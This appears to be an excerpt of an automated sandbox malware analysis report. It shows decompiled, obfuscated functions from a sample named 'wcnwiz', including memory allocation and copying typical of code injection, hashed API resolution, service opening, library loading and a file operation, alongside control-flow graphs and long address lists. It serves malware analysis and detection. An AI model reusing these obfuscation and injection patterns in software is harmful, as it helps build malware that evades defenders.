                                                        0x003b8430
                                                        0x003b8438
                                                        0x003b8440
                                                        0x003b8445
                                                        0x003b844a
                                                        0x003b8452
                                                        0x003b845a
                                                        0x003b8462
                                                        0x003b846a
                                                        0x003b8472
                                                        0x003b847a
                                                        0x003b8482
                                                        0x003b8491
                                                        0x003b8496
                                                        0x003b849a
                                                        0x003b84a2
                                                        0x003b84af
                                                        0x003b84b3
                                                        0x003b84bb
                                                        0x003b84c3
                                                        0x003b84cb
                                                        0x003b84cf
                                                        0x003b84d7
                                                        0x003b84df
                                                        0x003b84df
                                                        0x003b84e3
                                                        0x003b84e3
                                                        0x003b84e3
                                                        0x003b84e3
                                                        0x003b84e9
                                                        0x00000000
                                                        0x00000000
                                                        0x003b84ef
                                                        0x003b866e
                                                        0x003b8676
                                                        0x003b8696
                                                        0x003b869a
                                                        0x003b86a2
                                                        0x003b86a6
                                                        0x003b86aa
                                                        0x003b86b2
                                                        0x003b86b4
                                                        0x00000000
                                                        0x003b86ba
                                                        0x003b86ba
                                                        0x003b86c5
                                                        0x003b86d1
                                                        0x003b86bc
                                                        0x003b86bc
                                                        0x003b86be
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003b86be
                                                        0x003b86ba
                                                        0x003b84f5
                                                        0x003b84fb
                                                        0x003b854a
                                                        0x003b854f
                                                        0x003b8551
                                                        0x003b8558
                                                        0x003b855d
                                                        0x003b8564
                                                        0x003b8569
                                                        0x003b8569
                                                        0x003b8578
                                                        0x003b857c
                                                        0x003b857e
                                                        0x003b8589
                                                        0x003b858f
                                                        0x003b8591
                                                        0x003b8598
                                                        0x003b859d
                                                        0x003b85a4
                                                        0x003b85a9
                                                        0x003b85a9
                                                        0x003b85af
                                                        0x00000000
                                                        0x003b84fd
                                                        0x003b8503
                                                        0x003b8543
                                                        0x00000000
                                                        0x003b8505
                                                        0x003b850b
                                                        0x00000000
                                                        0x003b8511
                                                        0x003b8511
                                                        0x003b8518
                                                        0x003b851f
                                                        0x003b8524
                                                        0x003b852b
                                                        0x003b8530
                                                        0x003b8530
                                                        0x003b853a
                                                        0x003b853c
                                                        0x00000000
                                                        0x003b853c
                                                        0x003b850b
                                                        0x003b8503
                                                        0x003b84fb
                                                        0x00000000
                                                        0x003b84ef
                                                        0x003b85c8
                                                        0x003b85ce
                                                        0x003b8630
                                                        0x003b8635
                                                        0x003b8637
                                                        0x003b863e
                                                        0x003b8643
                                                        0x003b864a
                                                        0x003b864f
                                                        0x003b864f
                                                        0x003b8660
                                                        0x003b8662
                                                        0x00000000
                                                        0x003b85d0
                                                        0x003b85d0
                                                        0x003b85d6
                                                        0x00000000
                                                        0x003b85d8
                                                        0x003b85de
                                                        0x003b85e0
                                                        0x003b85e7
                                                        0x003b85ec
                                                        0x003b85fa
                                                        0x003b85fa
                                                        0x003b861d
                                                        0x003b861f
                                                        0x003b8621
                                                        0x003b8624
                                                        0x00000000
                                                        0x003b8626
                                                        0x003b8626
                                                        0x00000000
                                                        0x003b8626
                                                        0x003b8624
                                                        0x003b85d6
                                                        0x00000000
                                                        0x003b85b1
                                                        0x003b85b1
                                                        0x003b85b1
                                                        0x003b85bd
                                                        0x003b85bd
                                                        0x003b85c7
                                                        0x00000000

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 003B861D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                                        • Associated: 00000009.00000002.2265816784.00000000003B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265828788.00000000003BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265833373.00000000003BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3b0000_wcnwiz.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: ) `3$) `3$6w:$6w:$=
                                                        • API String ID: 823142352-4124229693
                                                        • Opcode ID: 13a9806be21a23056181fc79586ecea5ad591dd6780d7db323ed4c41f1c4a76f
                                                        • Instruction ID: fe6d8a9a8d27971852d37a8b0ba9fc090e985d357dba6ff7561f7eb16f6efb57
                                                        • Opcode Fuzzy Hash: 13a9806be21a23056181fc79586ecea5ad591dd6780d7db323ed4c41f1c4a76f
                                                        • Instruction Fuzzy Hash: 6E61E571A083129FC71ADF68C4556AFB7E9ABD0718F00891DF6999B290EB74DD04CF82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 160 3a0d60-3a0dd5 call 3a0ed0 VirtualAlloc RtlMoveMemory 164 3a0ddb-3a0dde 160->164 165 3a0ebe-3a0ec4 160->165 164->165 166 3a0de4-3a0de6 164->166 166->165 167 3a0dec-3a0df0 166->167 167->165 169 3a0df6-3a0dfd 167->169 170 3a0eaf-3a0ebb 169->170 171 3a0e03-3a0e36 call 3a1140 RtlMoveMemory 169->171 171->165 175 3a0e3c-3a0e4a VirtualAlloc 171->175 176 3a0e89-3a0ea0 RtlFillMemory 175->176 177 3a0e4c-3a0e52 175->177 176->165 182 3a0ea2-3a0ea5 176->182 178 3a0e5a-3a0e68 177->178 179 3a0e54-3a0e56 177->179 178->165 181 3a0e6a-3a0e7d RtlMoveMemory 178->181 179->178 181->165 183 3a0e7f-3a0e83 181->183 182->165 185 3a0ea7-3a0ea9 182->185 183->165 184 3a0e85 183->184 184->176 185->170 185->171
                                                        APIs
                                                          • Part of subcall function 003A0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003A0F08
                                                          • Part of subcall function 003A0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003A0F3E
                                                          • Part of subcall function 003A0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003A0F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 003A0DB4
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003A0DC3
                                                          • Part of subcall function 003A1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,003A0EFD,00000000), ref: 003A1155
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 003A0E11
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 003A0E3D
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003A0E6C
                                                        • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 003A0E98
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265812164.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3a0000_wcnwiz.jbxd
                                                        Similarity
                                                        • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                        • String ID:
                                                        • API String ID: 3581289920-0
                                                        • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction ID: 3ff1357751bb0e0721103577600254a6c1e0c026403546d2bcbe259add274a1e
                                                        • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction Fuzzy Hash: 8131F276A043406BD329DB60CC54EAB73EAEBCB381F044D2CB548D7351D635E880C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 186 3b8e80-3b8e98 187 3b8ea0-3b8ea5 186->187 188 3b8eab 187->188 189 3b8f7a-3b8f7f 187->189 190 3b8f3f-3b8f46 188->190 191 3b8eb1-3b8eb6 188->191 192 3b9011-3b9016 189->192 193 3b8f85-3b8f8a 189->193 198 3b8f48-3b8f5e call 3b3f00 call 3b3e60 190->198 199 3b8f63-3b8f75 190->199 194 3b901b-3b9022 191->194 195 3b8ebc-3b8ec1 191->195 192->187 196 3b8fce-3b8fd5 193->196 197 3b8f8c-3b8f91 193->197 207 3b903f 194->207 208 3b9024-3b903a call 3b3f00 call 3b3e60 194->208 200 3b8efc-3b8f03 195->200 201 3b8ec3-3b8ec8 195->201 204 3b8ff2-3b900c OpenServiceW 196->204 205 3b8fd7-3b8fed call 3b3f00 call 3b3e60 196->205 202 3b8fbb-3b8fc0 197->202 203 3b8f93-3b8fa3 197->203 198->199 199->187 216 3b8f20-3b8f2f 200->216 217 3b8f05-3b8f1b call 3b3f00 call 3b3e60 200->217 201->202 210 3b8ece-3b8ed5 201->210 202->187 213 3b8fc6-3b8fcd 202->213 211 3b8fae-3b8fb6 203->211 212 3b8fa5-3b8fac 203->212 204->187 205->204 222 3b9042-3b9049 207->222 208->207 220 3b8ef2-3b8efa 210->220 221 3b8ed7-3b8eed call 3b3f00 call 3b3e60 210->221 211->187 212->211 212->212 216->222 233 3b8f35-3b8f3a 216->233 217->216 220->187 221->220 233->187
                                                        C-Code - Quality: 66%
                                                        			E003B8E80() {
                                                        				short* _v4;
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t4;
                                                        				void* _t6;
                                                        				intOrPtr* _t11;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t19;
                                                        				intOrPtr* _t22;
                                                        				void* _t25;
                                                        				void* _t42;
                                                        				short* _t43;
                                                        				intOrPtr _t44;
                                                        				short* _t45;
                                                        				void* _t46;
                                                        				void* _t47;
                                                        
                                                        				_t25 = _v4;
                                                        				_t4 = 0x1779a150;
                                                        				_t46 = _v4;
                                                        				_t43 = _v4;
                                                        				_t42 = 0;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t47 = _t4 - 0xebfcc22;
                                                        						if(_t47 <= 0) {
                                                        							break;
                                                        						}
                                                        						if(_t4 == 0x1779a150) {
                                                        							_t4 = 0x23287775;
                                                        							continue;
                                                        						} else {
                                                        							if(_t4 == 0x1e3d7119) {
                                                        								if( *0x3be270 == 0) {
                                                        									 *0x3be270 = E003B3E60(_t25, E003B3F00(0x26f5757c), 0x56e230f9, _t46);
                                                        								}
                                                        								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
                                                        								_t25 = _t6;
                                                        								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
                                                        								continue;
                                                        							} else {
                                                        								if(_t4 != 0x23287775) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t44 =  *0x3be54c; // 0x51e730
                                                        									_t45 = _t44 + 0x260;
                                                        									while( *_t45 != 0x5c) {
                                                        										_t45 = _t45 + 2;
                                                        									}
                                                        									_t43 = _t45 + 2;
                                                        									_t4 = 0x10ada17;
                                                        									continue;
                                                        								}
                                                        							}
                                                        						}
                                                        						L32:
                                                        					}
                                                        					if(_t47 == 0) {
                                                        						_t11 =  *0x3be4c8;
                                                        						if(_t11 == 0) {
                                                        							_t11 = E003B3E60(_t25, E003B3F00(0x26f5757c), 0xe9d3e51f, _t46);
                                                        							 *0x3be4c8 = _t11;
                                                        						}
                                                        						 *_t11(_t25);
                                                        						_t42 =  !=  ? 1 : _t42;
                                                        						_t4 = 0xd10de09;
                                                        						goto L1;
                                                        					} else {
                                                        						if(_t4 == 0xbf6010) {
                                                        							_t15 =  *0x3be18c;
                                                        							if(_t15 == 0) {
                                                        								_t15 = E003B3E60(_t25, E003B3F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        								 *0x3be18c = _t15;
                                                        							}
                                                        							 *_t15(_t46);
                                                        							goto L31;
                                                        						} else {
                                                        							if(_t4 == 0x10ada17) {
                                                        								_t19 =  *0x3be310;
                                                        								if(_t19 == 0) {
                                                        									_t19 = E003B3E60(_t25, E003B3F00(0x26f5757c), 0x9ba7cd1, _t46);
                                                        									 *0x3be310 = _t19;
                                                        								}
                                                        								_t46 =  *_t19(0, 0, 0xf003f);
                                                        								if(_t46 == 0) {
                                                        									L31:
                                                        									return _t42;
                                                        								} else {
                                                        									_t4 = 0x1e3d7119;
                                                        									goto L1;
                                                        								}
                                                        							} else {
                                                        								if(_t4 != 0xd10de09) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t22 =  *0x3be18c;
                                                        									if(_t22 == 0) {
                                                        										_t22 = E003B3E60(_t25, E003B3F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        										 *0x3be18c = _t22;
                                                        									}
                                                        									 *_t22(_t25);
                                                        									_t4 = 0xbf6010;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L32;
                                                        					L22:
                                                        				} while (_t4 != 0x2dd4caa9);
                                                        				return _t42;
                                                        				goto L32;
                                                        			}




















                                                        0x003b8e82
                                                        0x003b8e86
                                                        0x003b8e8c
                                                        0x003b8e91
                                                        0x003b8e96
                                                        0x003b8e98
                                                        0x003b8ea0
                                                        0x003b8ea0
                                                        0x003b8ea0
                                                        0x003b8ea0
                                                        0x003b8ea5
                                                        0x00000000
                                                        0x00000000
                                                        0x003b8f7f
                                                        0x003b9011
                                                        0x00000000
                                                        0x003b8f85
                                                        0x003b8f8a
                                                        0x003b8fd5
                                                        0x003b8fed
                                                        0x003b8fed
                                                        0x003b8ff9
                                                        0x003b8ffb
                                                        0x003b9009
                                                        0x00000000
                                                        0x003b8f8c
                                                        0x003b8f91
                                                        0x00000000
                                                        0x003b8f93
                                                        0x003b8f93
                                                        0x003b8f99
                                                        0x003b8fa3
                                                        0x003b8fa5
                                                        0x003b8fa8
                                                        0x003b8fae
                                                        0x003b8fb1
                                                        0x00000000
                                                        0x003b8fb1
                                                        0x003b8f91
                                                        0x003b8f8a
                                                        0x00000000
                                                        0x003b8f7f
                                                        0x003b8eab
                                                        0x003b8f3f
                                                        0x003b8f46
                                                        0x003b8f59
                                                        0x003b8f5e
                                                        0x003b8f5e
                                                        0x003b8f64
                                                        0x003b8f6d
                                                        0x003b8f70
                                                        0x00000000
                                                        0x003b8eb1
                                                        0x003b8eb6
                                                        0x003b901b
                                                        0x003b9022
                                                        0x003b9035
                                                        0x003b903a
                                                        0x003b903a
                                                        0x003b9040
                                                        0x00000000
                                                        0x003b8ebc
                                                        0x003b8ec1
                                                        0x003b8efc
                                                        0x003b8f03
                                                        0x003b8f16
                                                        0x003b8f1b
                                                        0x003b8f1b
                                                        0x003b8f2b
                                                        0x003b8f2f
                                                        0x003b9042
                                                        0x003b9049
                                                        0x003b8f35
                                                        0x003b8f35
                                                        0x00000000
                                                        0x003b8f35
                                                        0x003b8ec3
                                                        0x003b8ec8
                                                        0x00000000
                                                        0x003b8ece
                                                        0x003b8ece
                                                        0x003b8ed5
                                                        0x003b8ee8
                                                        0x003b8eed
                                                        0x003b8eed
                                                        0x003b8ef3
                                                        0x003b8ef5
                                                        0x00000000
                                                        0x003b8ef5
                                                        0x003b8ec8
                                                        0x003b8ec1
                                                        0x003b8eb6
                                                        0x00000000
                                                        0x003b8fbb
                                                        0x003b8fbb
                                                        0x003b8fcd
                                                        0x00000000

                                                        APIs
                                                        • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,0051E730,003B8782,?,3251FEFE,?), ref: 003B8FF9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                                        • Associated: 00000009.00000002.2265816784.00000000003B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265828788.00000000003BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265833373.00000000003BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3b0000_wcnwiz.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenService
                                                        • String ID: 0Q$uw(#$uw(#
                                                        • API String ID: 3098006287-1879438421
                                                        • Opcode ID: 286bdf53b3ea8ddf261941232ff2d578f8bfd26bf9dc8011bf9c7af6111f2056
                                                        • Instruction ID: f77ce96f883290717875de58709f3bfbb3ff40a2b4c760fa055bca5de574631e
                                                        • Opcode Fuzzy Hash: 286bdf53b3ea8ddf261941232ff2d578f8bfd26bf9dc8011bf9c7af6111f2056
                                                        • Instruction Fuzzy Hash: F141D831B042149BDB266BBDAC807FA22DEA78475CF61092AF746CBF41EE74DC408791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 241 3b7120 242 3b7125-3b712a 241->242 243 3b7130 242->243 244 3b71b4-3b71b9 242->244 245 3b7233-3b7248 call 3b34c0 243->245 246 3b7136-3b713b 243->246 247 3b71bb 244->247 248 3b7207-3b720c 244->248 265 3b724a-3b7260 call 3b3f00 call 3b3e60 245->265 266 3b7265-3b7278 LoadLibraryW 245->266 251 3b713d 246->251 252 3b7190-3b7195 246->252 254 3b71ee-3b7202 call 3b7080 247->254 255 3b71bd-3b71c2 247->255 249 3b720e-3b7222 call 3b7080 248->249 250 3b7227-3b722c 248->250 249->242 250->242 262 3b7232 250->262 263 3b717a-3b718e call 3b7080 251->263 264 3b713f-3b7144 251->264 252->250 261 3b719b-3b71af call 3b7080 252->261 254->242 257 3b71d5-3b71e9 call 3b7080 255->257 258 3b71c4-3b71c9 255->258 257->242 258->250 267 3b71cb-3b71d0 258->267 261->242 263->242 273 3b7146-3b714b 264->273 274 3b7164-3b7178 call 3b7080 264->274 265->266 279 3b727a-3b7290 call 3b3f00 call 3b3e60 266->279 280 3b7295-3b72a0 266->280 267->242 273->250 275 3b7151-3b7162 call 3b7080 273->275 274->242 275->242 279->280 293 3b72bd-3b72c5 280->293 294 3b72a2-3b72b8 call 3b3f00 call 3b3e60 280->294 294->293
                                                        C-Code - Quality: 85%
                                                        			E003B7120(void* __ebx) {
                                                        				void* _t2;
                                                        				struct HINSTANCE__* _t8;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t11;
                                                        				void* _t21;
                                                        				intOrPtr _t23;
                                                        				void* _t48;
                                                        				WCHAR* _t51;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        
                                                        				_t21 = __ebx;
                                                        				_t2 = 0x291da748;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t54 = _t2 - 0x1a8031ec;
                                                        						if(_t54 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t54 == 0) {
                                                        							_t51 = E003B34C0(0x3bd830);
                                                        							__eflags =  *0x3bdd1c;
                                                        							if( *0x3bdd1c == 0) {
                                                        								 *0x3bdd1c = E003B3E60(_t21, E003B3F00(0x9bab0b12), 0xe4b28d97, _t53);
                                                        							}
                                                        							_t8 = LoadLibraryW(_t51);
                                                        							_t23 =  *0x3be548; // 0x557de0
                                                        							 *(_t23 + 0x4c) = _t8;
                                                        							_t9 =  *0x3be494;
                                                        							__eflags = _t9;
                                                        							if(_t9 == 0) {
                                                        								_t9 = E003B3E60(_t21, E003B3F00(0x9bab0b12), 0x7facde30, _t53);
                                                        								 *0x3be494 = _t9;
                                                        							}
                                                        							_t48 =  *_t9();
                                                        							_t11 =  *0x3bdf30;
                                                        							__eflags = _t11;
                                                        							if(_t11 == 0) {
                                                        								_t11 = E003B3E60(_t21, E003B3F00(0x9bab0b12), 0x5010a54d, _t53);
                                                        								 *0x3bdf30 = _t11;
                                                        							}
                                                        							return  *_t11(_t48, 0, _t51);
                                                        						} else {
                                                        							_t55 = _t2 - 0x185e9846;
                                                        							if(_t55 > 0) {
                                                        								__eflags = _t2 - 0x18843476;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									E003B7080(_t21, 0x3bd7a0, 4, __eflags);
                                                        									_t2 = 0x2eb73d4f;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t55 == 0) {
                                                        									E003B7080(_t21, 0x3bd8f0, 2, __eflags);
                                                        									_t2 = 0x9da2520;
                                                        									continue;
                                                        								} else {
                                                        									if(_t2 == 0x9da2520) {
                                                        										E003B7080(_t21, 0x3bd800, 3, __eflags);
                                                        										_t2 = 0x18843476;
                                                        										continue;
                                                        									} else {
                                                        										_t57 = _t2 - 0x15a7f569;
                                                        										if(_t2 != 0x15a7f569) {
                                                        											goto L21;
                                                        										} else {
                                                        											E003B7080(_t21, 0x3bd860, 0, _t57);
                                                        											_t2 = 0x39797244;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t2 - 0x2eb73d4f;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t2 - 0x39797244;
                                                        						if(__eflags != 0) {
                                                        							goto L21;
                                                        						} else {
                                                        							E003B7080(_t21, 0x3bd890, 1, __eflags);
                                                        							_t2 = 0x185e9846;
                                                        							goto L1;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							E003B7080(_t21, 0x3bd7e0, 5, __eflags);
                                                        							_t2 = 0x22a44863;
                                                        							goto L1;
                                                        						} else {
                                                        							__eflags = _t2 - 0x22a44863;
                                                        							if(__eflags == 0) {
                                                        								E003B7080(_t21, 0x3bd8c0, 6, __eflags);
                                                        								_t2 = 0x1a8031ec;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t2 - 0x291da748;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									_t2 = 0x15a7f569;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L21:
                                                        					__eflags = _t2 - 0x21acdd7e;
                                                        				} while (__eflags != 0);
                                                        				return _t2;
                                                        				goto L30;
                                                        			}














                                                        0x003b7120
                                                        0x003b7120
                                                        0x003b7120
                                                        0x003b7125
                                                        0x003b7125
                                                        0x003b7125
                                                        0x003b7125
                                                        0x003b712a
                                                        0x00000000
                                                        0x00000000
                                                        0x003b7130
                                                        0x003b723f
                                                        0x003b7246
                                                        0x003b7248
                                                        0x003b7260
                                                        0x003b7260
                                                        0x003b7266
                                                        0x003b7268
                                                        0x003b726e
                                                        0x003b7271
                                                        0x003b7276
                                                        0x003b7278
                                                        0x003b728b
                                                        0x003b7290
                                                        0x003b7290
                                                        0x003b7297
                                                        0x003b7299
                                                        0x003b729e
                                                        0x003b72a0
                                                        0x003b72b3
                                                        0x003b72b8
                                                        0x003b72b8
                                                        0x003b72c5
                                                        0x003b7136
                                                        0x003b7136
                                                        0x003b713b
                                                        0x003b7190
                                                        0x003b7195
                                                        0x00000000
                                                        0x003b719b
                                                        0x003b71a5
                                                        0x003b71aa
                                                        0x00000000
                                                        0x003b71aa
                                                        0x003b713d
                                                        0x003b713d
                                                        0x003b7184
                                                        0x003b7189
                                                        0x00000000
                                                        0x003b713f
                                                        0x003b7144
                                                        0x003b716e
                                                        0x003b7173
                                                        0x00000000
                                                        0x003b7146
                                                        0x003b7146
                                                        0x003b714b
                                                        0x00000000
                                                        0x003b7151
                                                        0x003b7158
                                                        0x003b715d
                                                        0x00000000
                                                        0x003b715d
                                                        0x003b714b
                                                        0x003b7144
                                                        0x003b713d
                                                        0x003b713b
                                                        0x00000000
                                                        0x003b7130
                                                        0x003b71b4
                                                        0x003b71b9
                                                        0x003b7207
                                                        0x003b720c
                                                        0x00000000
                                                        0x003b720e
                                                        0x003b7218
                                                        0x003b721d
                                                        0x00000000
                                                        0x003b721d
                                                        0x003b71bb
                                                        0x003b71bb
                                                        0x003b71f8
                                                        0x003b71fd
                                                        0x00000000
                                                        0x003b71bd
                                                        0x003b71bd
                                                        0x003b71c2
                                                        0x003b71df
                                                        0x003b71e4
                                                        0x00000000
                                                        0x003b71c4
                                                        0x003b71c4
                                                        0x003b71c9
                                                        0x00000000
                                                        0x003b71cb
                                                        0x003b71cb
                                                        0x00000000
                                                        0x003b71cb
                                                        0x003b71c9
                                                        0x003b71c2
                                                        0x003b71bb
                                                        0x00000000
                                                        0x003b7227
                                                        0x003b7227
                                                        0x003b7227
                                                        0x003b7232
                                                        0x00000000

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003B68AC), ref: 003B7266
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                                        • Associated: 00000009.00000002.2265816784.00000000003B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265828788.00000000003BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265833373.00000000003BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3b0000_wcnwiz.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: Dry9$Dry9$}U
                                                        • API String ID: 1029625771-3870248047
                                                        • Opcode ID: d595c728714cf67a16a9e9d97b3db5fdfcc99ecbcea77093eb086a4785ea5769
                                                        • Instruction ID: 9e7570ab9a53e26f654949a419781a162932126655149178c44b54469b7d33dd
                                                        • Opcode Fuzzy Hash: d595c728714cf67a16a9e9d97b3db5fdfcc99ecbcea77093eb086a4785ea5769
                                                        • Instruction Fuzzy Hash: C2318124F0D10047DA276ABE58A13FA11AAD7E030CF61446AF351CFF95ED36CE0143A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 301 3b3780-3b3793 302 3b37b0-3b37c5 301->302 303 3b3795-3b37ab call 3b3f00 call 3b3e60 301->303 307 3b37e2-3b37fa 302->307 308 3b37c7-3b37dd call 3b3f00 call 3b3e60 302->308 303->302 315 3b37fc-3b3812 call 3b3f00 call 3b3e60 307->315 316 3b3817-3b3832 307->316 308->307 315->316 321 3b384f-3b385e 316->321 322 3b3834-3b384a call 3b3f00 call 3b3e60 316->322 329 3b387b-3b38b4 321->329 330 3b3860-3b3876 call 3b3f00 call 3b3e60 321->330 322->321 335 3b38d1-3b38e2 SHFileOperationW 329->335 336 3b38b6-3b38cc call 3b3f00 call 3b3e60 329->336 330->329 336->335
                                                        C-Code - Quality: 62%
                                                        			E003B3780(void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                        				char _v520;
                                                        				char _v528;
                                                        				char _v536;
                                                        				char _v1040;
                                                        				char _v1056;
                                                        				short _v1072;
                                                        				char* _v1076;
                                                        				char* _v1080;
                                                        				intOrPtr _v1084;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t14;
                                                        				intOrPtr* _t16;
                                                        				intOrPtr* _t18;
                                                        				intOrPtr* _t20;
                                                        				signed int _t26;
                                                        				void* _t36;
                                                        				void* _t63;
                                                        				void* _t66;
                                                        				void* _t69;
                                                        				void* _t70;
                                                        				void* _t71;
                                                        				void* _t72;
                                                        				struct _SHFILEOPSTRUCTW* _t73;
                                                        
                                                        				_t70 =  &_v1072;
                                                        				_t12 =  *0x3bddc0;
                                                        				_t66 = __ecx;
                                                        				_t63 = __edx;
                                                        				if(_t12 == 0) {
                                                        					_t12 = E003B3E60(_t36, E003B3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x3bddc0 = _t12;
                                                        				}
                                                        				 *_t12( &_v1072, 0, 0x1e);
                                                        				_t14 =  *0x3bddc0;
                                                        				_t71 = _t70 + 0xc;
                                                        				if(_t14 == 0) {
                                                        					_t14 = E003B3E60(_t36, E003B3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x3bddc0 = _t14;
                                                        				}
                                                        				 *_t14( &_v1040, 0, 0x208);
                                                        				_t16 =  *0x3bddc0;
                                                        				_t72 = _t71 + 0xc;
                                                        				if(_t16 == 0) {
                                                        					_t16 = E003B3E60(_t36, E003B3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x3bddc0 = _t16;
                                                        				}
                                                        				 *_t16( &_v520, 0, 0x208);
                                                        				_t18 =  *0x3be298;
                                                        				_t73 = _t72 + 0xc;
                                                        				if(_t18 == 0) {
                                                        					_t18 = E003B3E60(_t36, E003B3F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x3be298 = _t18;
                                                        				}
                                                        				 *_t18( &_v1040, _t66);
                                                        				_t20 =  *0x3be298;
                                                        				if(_t20 == 0) {
                                                        					_t20 = E003B3E60(_t36, E003B3F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x3be298 = _t20;
                                                        				}
                                                        				 *_t20( &_v528, _t63);
                                                        				_v1084 = 1;
                                                        				_v1080 =  &_v1056;
                                                        				_v1076 =  &_v536;
                                                        				_v1072 = 0xe14;
                                                        				if( *0x3be30c == 0) {
                                                        					 *0x3be30c = E003B3E60(_t36, E003B3F00(0xd9518805), 0x262a6194, _t69);
                                                        				}
                                                        				_t26 = SHFileOperationW(_t73); // executed
                                                        				asm("sbb eax, eax");
                                                        				return  ~_t26 + 1;
                                                        			}


























                                                        0x003b3785
                                                        0x003b3780
                                                        0x003b378c
                                                        0x003b378f
                                                        0x003b3793
                                                        0x003b37a6
                                                        0x003b37ab
                                                        0x003b37ab
                                                        0x003b37b9
                                                        0x003b37bb
                                                        0x003b37c0
                                                        0x003b37c5
                                                        0x003b37d8
                                                        0x003b37dd
                                                        0x003b37dd
                                                        0x003b37ee
                                                        0x003b37f0
                                                        0x003b37f5
                                                        0x003b37fa
                                                        0x003b380d
                                                        0x003b3812
                                                        0x003b3812
                                                        0x003b3826
                                                        0x003b3828
